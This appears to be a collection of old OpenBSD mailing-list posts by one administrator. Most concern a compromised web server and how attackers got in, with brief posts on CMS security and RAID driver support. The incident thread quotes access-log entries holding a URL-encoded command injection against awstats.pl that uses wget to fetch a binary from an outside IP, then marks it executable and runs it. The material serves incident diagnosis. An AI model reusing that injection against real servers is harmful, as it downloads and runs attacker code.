1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:28, Joachim Schipper wrote: The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector. That was one of the locations that the linuxday worm was being downloaded from by the wget request. On 4 Jan 2006, at 16:35, Bryan Irvine wrote: I'd suspect it has something more to do with an easy-to-guess password. Even if the wget entries in the /var/www/logs/error_log correspond to the times and dates of the files in /tmp? bash-3.00# ls -lFa /tmp total 68 drwxrwxrwt 2 root wheel512 Jan 4 18:10 ./ drwxr-xr-x 22 root wheel512 Jun 29 2005 ../ -rw-r--r-- 1 wwwwheel 3355 Jan 2 04:14 .cpanel -rw-r--r-- 1 wwwwheel 18695 Jan 2 04:15 .cpanel.tmp -rw-r--r-- 1 wwwwheel 0 Jan 2 05:28 .plesk Some other suspect entries are these: 61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300 61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300 61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3 bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 308 Even though we don't have awstats installed anywhere (hence the 404). There are many 404 errors for this script. bash-3.00# locate awstats.pl bash-3.00# It's just a bit frustrating. Am I right in thinking if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog. This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:10, knitti wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Feb 2006, at 20:38, veins wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. historical ? There are sites on this machine that we've had since 2000, and that were running on various insecure os' from there before we made the move to OpenBSD. I suspect that it would be a medium/large sized task to make these sites work under chroot, as well as reorganise the user home folders to fit in with this. On the other hand, getting my server pwn3d (again) is even more of a ballache. Time to book in some configuration time... Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: Mambo Server hacks
On 26 Nov 2005, at 11:18, Edd Barrett wrote: Is there a better, more secure replacement as a CMS? Tried postnuke or phpnuke or one of the other hundreds of varients based around the word nuke? I've heard that they're not great in terms of security either. Have you considered Ruby on Rails? It's a bit more low level but a lot more fun. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
bioctl Device Support
HI, I've just upgraded to 3.8, hoping that ami/bioctl would support my RAID card, which it doesn't: ami0 at pci1 dev 14 function 1 Intel 80960RP ATU rev 0x02: irq 14 Dell 467/32b ami0: FW 1.06, BIOS v1p00, 128MB RAM ami0: 2 channels, 16 targets, 1 logical drives scsibus0 at ami0: 1 targets sd0 at scsibus0 targ 0 lun 0: AMI, Host drive #00, SCSI2 0/direct fixed sd0: 17136MB, 2184 cyl, 255 head, 63 sec, 512 bytes/sec, 35094528 sec total scsibus1 at ami0: 16 targets safte0 at scsibus1 targ 6 lun 0: DELL, 1x6 SCSI BP, 5.47 SCSI2 3/ processor fixed scsibus2 at ami0: 16 targets If I can ask, which models of RAID card are being worked on for the 3.9 release? Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/